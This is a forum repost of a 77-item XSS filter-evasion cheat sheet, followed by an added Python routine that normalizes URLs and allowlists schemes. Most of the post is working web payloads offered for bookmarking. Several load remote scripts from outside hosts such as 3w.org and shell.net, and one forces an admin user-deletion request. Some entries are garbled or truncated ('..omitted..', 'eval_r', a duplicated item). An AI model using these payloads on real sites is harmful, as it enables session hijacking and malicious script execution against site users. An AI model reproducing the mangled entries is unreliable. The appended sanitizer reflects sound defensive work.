It seems t00ls has relatively little material on XSS, so when I saw this good stuff I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around length limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2; null bytes basically do not work domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket and a tag name starting with a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands, can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
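The javascript:/vbscript: entries above (3 to 19, 31 to 54) all beat filters that compare the raw attribute value against a blacklist, because the browser decodes character references and drops control characters before it reads the scheme. The following example, added here and not part of the original post, normalizes a URL the same way and then allowlists the scheme instead of blacklisting spellings; the allowlist contents and the names normalize_url, url_scheme and is_safe_url are this example's own assumptions.

```python
import html
import re

# Schemes a user-supplied link or image URL may carry (assumed policy for
# this example). Anything else (javascript:, vbscript:, data:, ...) is
# rejected, so no spelling of a dangerous scheme has to be anticipated.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def normalize_url(value: str) -> str:
    """Undo what a browser undoes before it reads the URL scheme.

    Deliberately stricter than any one browser: the result is used only to
    decide whether the URL is acceptable, never written into the page.
    """
    # The HTML parser decodes character references before the URL is seen:
    # decimal or hex, with or without the trailing semicolon, and named
    # ones such as &colon; (entries 5, 8-10).
    decoded = html.unescape(value)
    # Browsers drop tab/newline/CR from URLs and ignore leading controls
    # and spaces; older engines also tolerated NUL, NBSP, Unicode spaces
    # and a BOM inside the scheme (entries 11-19, 47). Strip all of them.
    return "".join(
        c for c in decoded
        if ord(c) > 0x20 and not c.isspace() and c != "\ufeff"
    )


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalized URL, or '' for a relative URL."""
    m = _SCHEME_RE.match(normalize_url(value))
    return m.group(1).lower() if m else ""


def is_safe_url(value: str) -> bool:
    """Allowlist check for an href/src/url() value taken from user input."""
    scheme = url_scheme(value)
    # No scheme means a relative URL, which stays on the current origin.
    return scheme == "" or scheme in ALLOWED_SCHEMES
```

Entries 68 to 76 obfuscate the host rather than the scheme, so they pass this check: it only decides whether a URL may be emitted at all, and the original value must still be attribute-encoded when it is written into the page.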